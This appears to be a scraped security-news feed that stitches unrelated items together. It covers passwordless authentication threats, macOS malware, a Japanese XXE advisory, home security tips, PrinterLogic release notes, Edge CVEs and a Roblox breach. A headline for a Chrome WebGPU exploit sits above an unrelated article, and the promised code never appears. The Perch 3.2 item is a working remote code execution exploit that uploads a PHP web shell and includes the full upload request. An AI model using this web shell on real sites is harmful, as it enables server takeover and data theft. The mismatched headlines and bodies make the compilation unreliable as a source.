Google Chrome version 115.0.5790.102 WebGPU use-after-free memory corruption proof of concept exploit.

Google Chrome 115.0.5790.102 Memory Corruption

The industry has come a long way in terms of improving how we make user authentication more secure. From the most basic concept of relying on usernames and passwords for authentication to enabling multi-factor authentication (MFA) for additional security, we are now embracing a shift toward passwordless logins and/or

Tuesday, July 25, 2023 07:07

_By Thorsten Rosendahl and Tiago Pereira, with contributions from Matthew Miller._

The industry has come a long way in terms of improving how we make user authentication more secure. From the most basic concept of relying on usernames and passwords for authentication to enabling multi-factor authentication (MFA) for additional security, we are now embracing a shift toward passwordless logins and/or passkeys that are designed with security in mind from the beginning.

We anticipate that passwords may disappear in a not-so-distant future, with actors likely to shift away from basic phishing or other attacks that target passwords, toward post-authentication session theft, or the weaker registration, recovery, and revocation processes.

We can broadly group the distinct types of authentication as follows:

**Password-based authentication** is the weakest type of authentication, and it is vulnerable to several types of attacks, such as brute force, phishing and password stuffing, in which an attacker tries to use credentials that are obtained from a breach in some online service to log into other online services and applications.

**Multi-factor authentication (MFA)** is an authentication method whereby a user must present two or more factors to successfully pass an authentication. MFA, when passkeys are not one of the factors, protects the user against several attacks, most notably those that rely on password guessing (e.g., brute force and password spraying) and those based on credential leakage from third-party websites (e.g., password stuffing). However, it does not protect against all phishing attacks.

An attacker can redirect a user to a legitimate-looking phishing website that proxies all the information between the victim, itself, and a legitimate website. Once the victim unknowingly visits the malicious site, they are prompted to submit their credentials and accept an MFA authentication request. After this happens, the legitimate website will generate a session ID that the attacker can steal and use to access the application posing as the victim.

**Device-bound passkeys** are a form of passwordless authentication based on the open FIDO2 (Fast Identity Online) standard that is supported by most modern browsers and operating systems and allows users to log into websites simply clicking a button or touching a biometric reader on the device or on a mobile device. This wide support and its usability features make passkeys a viable alternative to even usernames and passwords that are combined with MFA.

In short, instead of putting the burden on the user to create and memorize unique, complex passwords for each service they use, FIDO2 credentials provide a cryptographic solution that offers stronger authentication than common MFA techniques (SMS, OTP, Push) allow. FIDO2 uses a public/private key pair, where the private key is stored on the user’s device, and the public key is registered with the online service provider.

This mechanism has several advantages over password-based and MFA authentication:

*   **It is phishing resistant** — The browser is responsible for checking if the authenticator contains passkeys for a given URL. For example, when opening a phishing website, the browser would find that the authenticator does not have a stored credential for it, so it would not provide the user a way to login.
*   **It is resistant to credential stuffing** – The public key is not a secret, and it is unique for each website. Even if a third-party website is breached and the public key stolen, it cannot be used by attackers to authenticate as the user.
*   **Private keys can be protected by hardware** — The private key can be forced to be protected by a hardware module from which it cannot be exported. The private key is only used within that hardware module to create a signature and it is never exposed to a potentially compromised operating system. However rare, there have been vulnerabilities found in hardware modules that may allow attackers to steal private keys.
*   **It is more user-friendly** - Users no longer must remember, manage, or write passwords. Instead, the user only needs a couple of clicks to quickly log in via a ceremony handled by the browser.

Although FIDO2 has many advantages over other means of authentication, it does not change how the application session mechanism works. Therefore, on a compromised device, an attacker can still steal the session ID post-authentication and use it to access the application, posing as the user.

**Synced passkeys**, also known as FIDO2 multi-device credentials, are like regular FIDO2 credentials, but they can be copied between user devices, allowing a user to only register once with a relying party and synchronize their key across all his devices. This is a significant step toward the adoption of passwordless authentication, as it minimizes the risk that the user loses access to their private keys and avoids the trouble of having to register and manage multiple devices and keys.

However, this increase in usability comes at a cost in security. The need to copy private keys to the cloud and to other devices means that they can be compromised if an attacker is able to register a new device posing as the victim or if the passkey implementation allows them to be stolen from the operating system memory or disk.

How phishing-resistant authentication could change the threat landscape

Although it will likely take several years for passwordless authentication to become widely adopted, and it is likely that passwords will be around for a long time, some of the most popular and most targeted applications may adopt it in the near future. Removing passwords from even a few dozen key web applications is likely to affect the threat landscape.

**Targeting registration, recovery and revocation process flaws**

Authentication is only one part of a larger identity management process. As much as phishing-resistant authentication is a significant increase in web application security, there are processes that must exist to allow the user to be able to use passwordless authentication, in particular, registration, revocation and recovery. This could lead to some changes in the way attackers use phishing to obtain access to target applications. For example:

**Phishing for cloud providers** – What happens when you lose access to all your devices at the same time? The answer is usually that the cloud provider allows a user to log in with a less secure method, which may be phishable. Because this fallback system exists, attackers will try to phish the users, leading them to provide all the details needed to recover from a scenario in which all device access was lost.

**Phishing for password managers** – As password managers start to store passkeys, they may become a larger target for phishing attacks, as they are the “master key” to obtaining phishing-resistant credentials. Like cloud providers, most password managers allow users to use MFA when installing it on a new device. This means that, ironically, in a passwordless future, it is possible that password managers will become a bigger target for phishing attacks.

**Phishing for email providers** – It is common to send “magic links” to a registered user email address that, when clicked, takes the user to a page where his password can be reset. The same system can be used for passkey re-registration. This could make email providers an even more common target for phishing attacks, as they become a way to bypass the phishing-resistant authentication on other targeted applications.

**Targeting sessions, not authentications**

Phishing-resistant authentication eliminates attacks that steal login credentials, leaving post-auth session IDs as the most valuable assets. Consequently, it is possible that attacks targeting session IDs will increase in popularity. These are some examples of ways the session could be attacked that could see an increase as passwords start to disappear:

**Attacks based on bookmarklets** – Bookmarklets are a feature of web browsers that allow JavaScript code to be saved as a bookmark. When the user clicks on the bookmark, the code is executed in the context of the open browser page. One example of this is a recent attack where bookmarklets were used to steal the Discord token from users of several Discord communities focused on cryptocurrency.

**Attacks involving the clipboard –** Tricking a user into executing malicious JavaScript or system commands by copy-pasting them from a website into the address bar, browser developer tools, or even the terminal can be used to steal session IDs from the browser or from the file system. This can happen as a result of social engineering, such as when users are following a tutorial that involves copy-paste code from a webpage. As a way to make these attacks more effective, pastejacking can be used to replace apparently innocuous code copied from a webpage with malicious code, tricking even more advanced users.

**Browser-based malware changes** – As session IDs increase in value, malware focused on the browser (for example, intercepting browser communications, injecting code into web pages or instrumenting hidden browser windows) may be subject to changes that assist new attacks and malicious business models. For example, adding features such as keeping sessions alive once they are stolen or proxying attacker HTTP requests within the context of the victim browser sessions.

Although not a threat landscape change, as session theft, becomes a major vector of compromise, it is possible that session security is increased, leading to bigger changes. Several session protection techniques that exist today may become more widely adopted, including regenerating the session ID frequently during an established session and reducing the session timeout or denying access to the session id from JavaScript. Much like what has happened to authentication, new standards could be developed that focus on the protection of web sessions.

**Cybercrime business models adapt to the change**

Many of the passwords that attackers are currently harvesting will be rendered obsolete with the adoption of passwordless authentication. This may cause changes both in malware and in cybercriminal’s business models built around selling access to compromised accounts:

**Malware-based attacks may increase** – Criminals are not likely to give up entirely because phishing has become harder or impossible. The groups that are currently dedicated to phishing could be forced to take the next step and focus on malware-based attacks. This shift could result in an increase in malware-based attacks, using the same distribution channels that phishing groups are used to (e.g., email or instant messaging).

**Business models around selling compromised accounts may change** – To take advantage of the stolen session IDs, attackers will have to act quickly while the session is active. As selling or taking advantage of valid session IDs becomes harder, attackers will adapt. We are already seeing signs of this adaptation. For example:

*   Phishing kits commonly make use of telegram bots to allow attackers to react faster when a new session ID is stolen.
*   The dark web Genesis market, which is back up again after being taken down by law enforcement a few months ago, specializes in selling “bots” which is the terminology the market owners used to call a package with a victim’s browser credentials’ cookies and fingerprints. To make this data easier to use, the market provides a specialized browser and Chrome extension to its customers, so they load the purchased “bot” data and easily use the authenticated sessions of each purchased bot. The user has the possibility of using the victim’s browser as a proxy, to make the abuse even harder to detect.  
    As criminals focus on sessions and these become increasingly more secure, the business models can adapt even further. For example, instead of selling stolen sessions, attackers could sell access to automated malicious actions to be triggered each time a session is compromised to the highest bidder, like high-frequency trading used in stock markets.

**Web application vulnerability value increase** – Web applications, just like any other software, can contain vulnerabilities introduced during development. Many of these allow an attacker to steal valid sessions or perform malicious actions directly without targeting the session. It would not be surprising if, with the unavailability of phishing as an attack vector, web app vulnerabilities became more commonly traded on underground forums and saw their value increase.

While the exact predictions in this post may or may not ever take place, passwordless authentication is gaining traction and it is certainly in the future of web authentication. Inevitably it will bring changes to attack techniques for which we should prepare sooner rather than later.

What might authentication attacks look like in a phishing-resistant future?

As the number of people using macOS keeps going up, so does the desire of hackers to take advantage of flaws in Apple's operating system. 
What Are the Rising Threats to macOS?
There is a common misconception among macOS fans that Apple devices are immune to hacking and malware infection. However, users have been facing more and more dangers recently. Inventive attackers are specifically

As the number of people using macOS keeps going up, so does the desire of hackers to take advantage of flaws in Apple's operating system.

**What Are the Rising Threats to macOS?**

There is a common misconception among macOS fans that Apple devices are immune to hacking and malware infection. However, users have been facing more and more dangers recently. Inventive attackers are specifically targeting Mac systems, as seen with the "Geacon" Cobalt Strike tool attack. This tool enables them to perform malicious actions such as data theft, privilege elevation, and remote device control, placing the security and privacy of Mac users at grave risk.

Earlier this year, researchers also uncovered the MacStealer malware, which also stole sensitive data from Apple users. Documents, iCloud keychain data, browser cookies, credit card credentials – nothing is safe from the prying eyes.

But that's not all. CloudMensis is malicious software that specifically targets macOS systems, spreading through email attachments and compromising device security. It can steal sensitive information and grant unauthorized access to users' systems. JockerSpy, on the other hand, can infiltrate a system through deceptive websites or bundled with seemingly harmless software. Once installed, it can monitor users' activities, capture keystrokes, and access personal data.

Even state-sponsored hacking organizations, like the North Korean Lazarus Group, have started targeting Apple Macs. Do you think this was a wake-up call for many Apple users who thought their devices were immune to getting attacked?

**Mac Security Survey 2023: User Awareness and Behavior**

To understand the state of cybersecurity on the Mac, the Moonlock team, a dedicated group of MacPaw's researchers and engineers focused on the cybersecurity needs of Mac users, conducted a survey. From their fears and concerns to their behaviors and misconceptions, here's how Mac users are navigating the increasingly complex security landscape:

**Cybersecurity Myths are Still Alive**

Despite the growing risks, many Mac users still take their cybersecurity lightly. Just think about it, Moonlock's Mac Security Survey 2023 reveals that every third Mac user believes their data is of no interest to cybercriminals. 57% of Mac users either agree or hesitate to disagree with the statement, "Malware does not exist on macOS."

**Awareness is High, but Risky Behaviors Abound**

The truth is many Mac users have already fallen victim to attacks. More than 50% of respondents have experienced malware, hacking, or fraud personally or in their closest environment. 69% of them have personally faced at least one of these threats:

*   Malware, viruses
*   Hacking accounts, stealing passwords
*   Scam
*   Collection of personal data from browsers and social networks
*   Breach of personal data
*   Phishing
*   Violation of online payment security
*   Identity theft (including SSN theft)
*   Access to correspondence and private files.

This shows how vulnerable macOS is and highlights the need for stronger security.

Despite threats, 22% of Mac users have the same password for multiple accounts, and 31% skip software updates. At the same time, 45% feel that they don't do enough to protect themselves from cyber threats.

**There's a Lack of Clarity About Security Tools**

When it comes to digital security, there seems to be a lack of clarity around the use of security tools. Did you know that 11% of respondents who say they use a password manager actually store their passwords in their browsers? And interestingly, 35% of self-reported secure browser users consider Safari and Google Chrome to be safe options.

**There's Also a Lack of Reliable Info**

According to Moonlock's research, 52% of Mac users actually want to talk to experts about how to stay safe online. However, 30% of users struggle to find reliable sources of information on the topic.

It is critical that Mac users remain vigilant, make cybersecurity a priority, and stay informed about the evolving threat landscape. By raising awareness and promoting proactive security measures, we can strengthen the protection of our Mac systems and safeguard our digital lives.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

macOS Under Attack: Examining the Growing Threat and User Perspectives

Applicant Programme Ver.7.06 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.

**申請人プログラム及び申請データ仕様書等について（動産・債権譲渡登記）****１　申請人プログラム及び操作説明書**

１　申請人プログラム  
　　申請人プログラムについては、次をクリックしてダウンロードしてください。  
　　■　申請人プログラム　Ver.7.07 （※ 動作保証環境：Windows10 64bit ）  
　　　　※推奨ブラウザは、Microsoft Edge 又は Google Chrome です。  
　　　 　　　これら以外のブラウザを使用した場合には、画面が一部正しく表示されない等の事象が発生する可能性があります。

２　申請人プログラム操作説明書  
　　申請人プログラムの操作説明書については、次をクリックしてください。  
　　■　申請人プログラム操作説明書（動産譲渡登記編）（令和５年７月）【ＰＤＦ】  
　　■　申請人プログラム操作説明書（債権譲渡登記編）（令和５年７月）【ＰＤＦ】

**２　申請データ仕様****３　事前提供方式の概要**

事前提供方式の概要については、次をクリックしてください。

 ■　事前提供方式の概要【ＰＤＦ】  

**４　お知らせ**

■　令和５年７月２４日  
　　　申請人プログラムにおいてＸＭＬ外部実体参照 （ＸＸＥ） に関する脆弱性（ＣＷＥ－６１１）が発見されたため、令和５年７月２４日（月）に「申請人プログラムVer7.07」を公開しました。御利用の申請人プログラムのバージョンが7.07以降のものになっている場合には、脆弱性対応が完了しています。  
　　　まだ最新のバージョンへの更新がお済みでない方は、最新のソフトウェアを入手し、更新作業を行ってください。

PDF形式のファイルをご覧いただく場合には、Adobe Readerが必要です。  
Adobe Readerをお持ちでない方は、バナーのリンク先から無料ダウンロードしてください。  
リンク先のサイトはAdobe Systems社が運営しています。

※上記プラグインダウンロードのリンク先は2015年4月時点のものです。

CVE-2023-32639: 法務省：申請人プログラム及び申請データ仕様書等について（動産・債権譲渡登記）

Categories: News
Categories: Personal
Tags: parents

Tags:  cybersecurity

Tags:  chromebook

Tags:  auto updates

Tags:  urgent notifications

Tags:  remote desktop

Tags:  router

Tags:  block list

Tags:  encryption

Here are some tips that you can use to set up a secure environment for your parents' digital needs.



(Read more...)




The post How to set up computer security for your parents appeared first on Malwarebytes Labs.

If you want to tighten up your parents' home cybersecurity as much as possible, you've come to the right place. After all, you’re no doubt the family IT person, and first point of contact if trouble arises. 

**Consider a Chromebook.** If someone is looking for a new computer system for regular, non-demanding purposes, such as browsing, social media, and email, you can help with recommendations. For such a person, who isn't invested in heavy gaming, a Chromebook would be a good option, as it will save them some money and can perform all those functions, plus allows them to play browser-based games if needed.

**Turn on auto-update.** Installing software on a system usually comes with the task of having to keep it up-to-date. Therefore, any software program, operating system or browser that has an option to auto-update should be set to do this. We know this isn’t always recommended in a work environment, but for the computer illiterate person in their own home, it’s perfect. One less thing to worry about.

**Configure their security software.**  In addition, selecting security software that allows users to minimize notifications to only dire warnings will keep users from getting confused. Notifications coming from programs can have strange effects on the less computer savvy for several reasons:

*   They don’t understand to which program the messages belong, which takes away the context for them
*   The text in the notifications is designed to be short, which means they’re not always maximized for clarity
*   Technical terms used in the notification may be unfamiliar

When there are too many notifications, people can get fatigued. Most will simply want the pop-ups to disappear, no matter what they have to click on to accomplish this. So, any software that can be set to only issue a warning when something is really amiss deserves a big plus.

**Disabled Remote Desktop.** If you’re dealing with a Windows computer, disable Remote Desktop. Remote Desktop is sometimes used by scammers in things like technical support scams, so if you don't need it you may as well turn it off. You can do this in Settings. Here's how to do it in Windows 10:

*   Launch the **Settings** app. (shortcut **Win + I**)
*   Under the System **section**, scroll down and click on the Remote Desktop **option**.
*   Then, click on the toggle next to the Remote Desktop option to turn it off.

*   Windows will prompt you to confirm your decision.
*   Click on the Disable button and exit the settings app.

**Use an easy to maintain blocklist or firewall.** This can keep a lot of harm at bay. Alternatively, make use of security software that includes a web protection module, like Malwarebytes Premium.

**Configure the router accordingly.** Make sure to configure the home router and access points with unique usernames and passwords and do not use the default ones that come with the equipment. Many botnets will attempt to take over such devices by trying default credentials.

There are some other basic settings that can enhance the security of the home router without hindering the users:

*   Turn off remote management if enabled.
*   Use WPA2 or WPA3 (if available) encryption on Wireless routers.

**Hang up, close the tab, and call your bank.** A Dutch bank ran a very effective campaign that advised customers to “Hang up, close the tab, and call your bank.” This is very easy to remember and very effective at the same time. Tell your parents to remember that phrase when they see “urgent” warnings online or get cold calls from Microsoft, their bank, or any other entity that seeks access to personal or financial information. It’s good to teach your parents they shouldn’t trust that friendly voice with a concerned tone, if they can’t verify their identity. The same is true for text and chat messages. Even if the sender claims to be you on your new phone.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

How to set up computer security for your parents

An issue was discovered in Vasion PrinterLogic Client for Windows before 25.0.0.836. During client installation and repair, a PrinterLogic binary is called by the installer to configure the device. This window is not hidden, and is running with elevated privileges. A standard user can break out of this window, obtaining a full SYSTEM command prompt window. This results in complete compromise via arbitrary SYSTEM code execution (elevation of privileges).

Windows Build 25.0.0.930 - 7/6/23

*   An issue where the Windows Client sent print job info with a blank user when checking quota was resolved. - PI-50558
    
*   An issue causing the change not to be recognized when changing between uppercase/lowercase letters in the SNMP community name on the Port tab of a printer object has been resolved. - PI-47932
    

Windows Build 25.0.0.896 - 5/2/23

*   An issue with Quota Management causing an LDAP user to not be identified correctly when IdP was disabled has been resolved. This was allowing end-users to print to a secure printer when they were over their set quota. - PI-42942
    

Windows Build 25.0.0.888 - 4/5/23

*   An issue when performing a migration that was causing print mappings to not convert printers to Direct-IP has been resolved. - PI-43675
    

Windows Build 25.0.0.882 - 3/29/23

*   An issue that was causing some customers to experience extreme increases in traffic during off hours, and would sometimes cause users to receive an error message about the client service being unavailable when they try to install a printer from the self-service portal has been resolved. - PI-47379
    
*   An issue where non lower case home urls were causing off network jobs to fail with a 400 message has been resolved. - PI-47505
    

Windows Build 25.0.0.874 - 3/14/23

*   An issue when updating the service manager that caused it to stop functioning, which then caused all services to stop, has been resolved. - PI-47191
    

Windows Build 25.0.0.870 - 3/9/23

*   An issue when using Off-Network Printing with Direct IP Primary set, causing printing to a pull printer to time out and cause a delay has been resolved. - PI-46573
    

Windows Build 25.0.0.864 - 2/24/23

*   Corrected an issue with Off-Network Printing IdP authentication that was causing the print job to never reach the Internal Routing Service. - PI-46715
    

Windows Build 25.0.0.857 - 2/16/23

*   An issue causing the IDP authentication app to not update correctly causing IDP logins to fail has been resolved. - PI-46048
    
*   Added improvements for the clients ability to remember/restore end-user default printers in non-persistent virtualized environments. - PI-46167
    

Windows Build 25.0.0.836 - 2/10/23

*   Minor update to custom actions in MSI installer. PI-46396
    
*   An issue causing document page counts to be multiplied by two, causing inaccurate total page counts has been resolved. - PI-43972
    

Windows Build 25.0.0.827 - 2/2/23

*   Minor security fixes.
    
*   Corrected an issue where IDP information was not associated with print stats from held/released print jobs.
    
*   Corrected a label where windows 11 machines would show as windows 10 in the logs.
    

Windows Build 25.0.0.810 - 1/19/23

*   An issue when logging into an IdP using a username containing an apostrophe causing the login to fail has been resolved. - PI-44304
*   An issue when using Off-Network Printing with a self-hosted gateway causing print jobs to fail has been resolved. - PI-43523
*   An issue when using ONP printing to a pull printer without having a release printer installed causing the print job to fail has been resolved. - PI-44448

Windows Build 25.0.0.796 - 1/3/23

*   An issue when using Printer names with the "&" character causing issues with refreshing configurations and profile changes has been resolved. - PI-37851
*   An issue when using printer names with special character "é" causing the printer to not install has been resolved. - PI-42034
*   An issue with the automatic client update not working when item level targeting is applied has been resolved. - PI-41825

Windows Build 25.0.0.788 - 12/15/22

*   An issue for some users in some environments, that they would appear to successfully log in to the client with IDP, but it would not show that they are logged in has been resolved. - PI-44946
    

Windows Build 25.0.0.786 - 12/9/22

*   An issue causing the client to lose authentication when switching between home URLs has been resolved. - PI-44156
    
*   An issue when using a virtual environment, causing the Windows client to not check in causing end-users to be unable to install printers has been resolved. - PI-43420
    

Windows Build 25.0.0.772 - 11/24/22

*   Corrected an issue where occasionally a remote session into a VM will report the incorrect IP address for the end-point connection.. - PI-28416
    

Windows Build 25.0.0.769 - 11/15/22

*   Corrected an issue that was caused if the Client was installed using a command prompt but choosing not to also install the extension. If later deciding to manually install the extension, the extension was not working properly. - PI-43690
    

Windows Build 25.0.0.765 - 11/11/22

*   Corrected an issue where sometimes clients would require reauthorization after visiting the self-service portal.
    
    For existing workstations experiencing this issue, you will need to clear the 'classes' registry key and reauthorize the client. This can be done by uninstalling the client and reinstalling with an auth code on the command line, or manually typing in an auth code when prompted. - PI-42687
    

Windows Build 25.0.0.756 - 10/29/22

*   Added a client override to handle a specific condition where Chromebooks are connecting to a Windows server (RDS or VDI) that allows the 'hostname' detected in the virtual session to be treated as an AssetID or a Serial number or both. This override will assist with deployments. - PI-41633

Windows Build 25.0.0.751 - 10/26/22

*   Corrected an issue where a performance mechanism was incorrectly reducing the responsiveness of release messages. - PI-43285
*   Corrected an issue where the PJ monitor thread was being stopped and started repeatedly. - PI-28046

Windows Build 25.0.0.727

*   Updates were made to give the ability to turn off automatic browser extension installation when updating/installing the client. Information on parameters to control this can be found on the Install Client on Windows documentation. - PI-36841

Windows Build 25.0.0.715

*   Several updates were made to resolve issues when running in RDS mode. - PI-40969
    *   Resolved an issue with being unable to create printers or set default printers in RDS mode.
    *   Resolved an issue when a service client was running on an RDS server, it would attempt to run a Service Client in every session.
*   Corrected several minor performance issues.

Windows Build 25.0.0.704

*   An issue causing the need to reinstall an authorization code at random has been resolved. - PI-39384
*   When in RDS mode, an issue causing the SNMP monitor process to start in each user session has been resolved. - PI-40726
*   A request to remove the "Refreshing Client" message when a client refresh occurs has been completed. - PI-39388

Windows Build 25.0.0.673

*   An issue causing the service manager to not start when installing a fresh client has been resolved. - PI-39002
*   An issue causing printers to be removed from Self-service Portal when a login to the Admin Console is performed on the same browser session has been resolved. - PI-18993

Windows Build 25.0.0.672

*   An issue causing a prompt to reinstall the edge extension when launching a published app in Citrix TS session has been resolved. - PI-36973
*   An issue causing the desktop client login screen to open in two browser windows has been resolved. - PI-34725
*   An issue causing a buildup of npPrinterInstallerClientPlugin32.exe processes has been resolved. - PI-38371
*   An issue when in a Citrix environment in RDS mode to identify held print jobs as the domain user attribute instead of the IdP user attribute has been resolved. - PI-36944
*   An issue when using Citrix in RDS mode causing printers from previous sessions to still be visible when previously removed has been resolved. - PI-36436

Windows Build 25.0.0.603

*   An issue causing stress to the web server when a large number of clients come online at once has been resolved.
*   Added ability to deploy printers based on MAC address of thin clients in VDI environment.

Windows Build 25.0.0.590

*   An issue causing RDS mode to not be reinforced has been resolved. - PI-36436
*   Udates to assist with PIV/CAC users were implemented.
*   An issue causing the Edge extension to not work after an update to a new client has been resolved. - PI-32790

Windows Build 25.0.0.540

*   An issue causing the portal pages to not load when using IE 11 has been resolved. - PI-31743
*   In issue causing an error when upgrading the client has been resolved. - PI-31021
*   An error causing the wrong address to be returned from the registry has been resolved. - PI-30213
*   An issue causing secure release print jobs with Chinese characters in the title to not release has been resolved. - PI-30213

CVE-2023-32232: Client Release Notes

Perch version 3.2 suffers from a remote code execution vulnerability.

    Exploit Title: Perch v3.2 - Remote Code Execution (RCE)Application: Perch CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://grabaperch.com/Software Link: https://grabaperch.com/downloadDate of found: 21.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)4. upload poc.phar filepoc.phar file contents :<?php $a=$_GET['code']; echo system($a);?>5. visit  http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwdpoc request: POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1Host: localhostContent-Length: 1071Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9Connection: close------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceTitle"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image"; filename="poc.phar"Content-Type: application/octet-stream<?php $a=$_GET['code']; echo system($a);?>------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_field"1------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_assetID"------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceBucket"admin------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="tags"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="btnsubmit"Submit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="formaction"edit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="token"5494af3e8dbe5ac399ca7f12219cfe82------WebKitFormBoundaryYGoerZn09hHSjd4Z--

Perch 3.2 Remote Code Execution

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

CVE-2023-38187

Microsoft Edge (Chromium-based) Spoofing Vulnerability

CVE-2023-35392

By Waqas
It turns out that Roblox suffered a data breach in 2021, but the company only revealed its details this week.
This is a post from HackRead.com Read the original post: Roblox Data Breach: PII of Thousands of Developers Stolen

In total, 3,943 Roblox developer accounts were compromised but what’s more concerning is that, apart from adults, children aged 13 and above are also allowed to join the Roblox Developer program.

Back in 2021, Roblox suffered a data breach, but the company reportedly hid this information for at least two years. The breach mainly impacted attendees of past conferences held between 2017-2020 for Roblox developers, who now risk harassment and online scams like identity theft.

The website Have I Been Pwned’s creator Troy Hunt brought the data exposure to public attention on 18th July. According to Hunt’s tweet, several people informed him about their private details available online. However, Hunt stated that the breach’s impact didn’t go beyond Roblox’s niche cheating communities.

Hunt explained that the breach originally occurred on 18th December 2020, and around 3,943 accounts were compromised. The exposed data included sensitive details such as names, usernames, phone numbers, email IDs, IP addresses, home addresses, date of birth, and T-shirt sizes. When he informed the company, Roblox said they had contacted all affected individuals.

“Minimally affected users just got a sorry email. For more seriously affected users, they got a year of identity protection and an apology for everyone else,” Roblox’s response to Hunt read.

Emails sent by Roblox

Roblox admitted that a third-party security issue led to unauthorized access to a subset of personal data belonging to its creators. The company collaborated with independent experts and launched an investigation to determine the cause and impact of this incident.

The companies maintained that it will send all impacted creators an email informing them about the steps Roblox intends to take to support them, and they will now vigilantly monitor and vet its cybersecurity systems and the affiliated third-party vendors.

It must be noted that, apart from adults, children aged 13 and above are also allowed to join the Roblox Developer program, according to this Roblox guide. However, the platform isn’t designed for minors.

This is why the data leak can have a far-reaching impact, considering that, according to the first quarter earnings report of 2023, approximately 43% of Roblox’s over 66 million daily active users were minors.

The exposure of email IDs can expose users to phishing attempts or spam campaigns. Moreover, targeted scams can be launched easily using other details.

In a comment on the Roblox breach, Samantha Humphries, Head of Security Strategy EMEA, Exabeam told Hackread.com that “The threat actors who conducted the attack were likely not going after Roblox, but the personal accounts and workplaces of those who attended the conference. Rather than attack each organisation individually, the adversary probably figured it would be easier to break through Roblox, particularly because this isn’t the company’s first data leak incident.”

Samantha warned that “For any organisation that had representatives attending the conference, it’s critical to have visibility and insights into user activities to detect anomalies, investigate, and then mitigate any abnormal behaviour.”

“To reduce the chance of unauthorised third-party access, which Roblox confirmed contributed to the release, I would encourage organisations to create a vendor risk management plan, thoroughly vet third parties, and require accountability to remain vigilant and align to best cybersecurity practices such as strong password management, Samantha advised.

Roblox is a widely used platform boasting an extensive user base and developer community. But, the platform is criticized for weak security. The company claims to protect user privacy and data, but its attempt to hide the breach for such a long time has tainted users’ trust.

Users should take precautionary measures while using these services. Always change your password periodically and enable 2FA authentication. Keep monitoring financial accounts to identify suspicious activities promptly.

**RELATED ARTICLES**

1.  Hackers deface Roblox accounts with pro-Trump messages
2.  Epic Games Forums Suffer Data Breach; 800k Accounts Stolen
3.  Town of Salem data breach: Personal data of 7.6M gamers stolen
4.  Game giant Electronic Arts is the latest victim of massive data breach
5.  Fake ROBLOX and Nintendo game cracks drop ChromeLoader malware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Tag

#chrome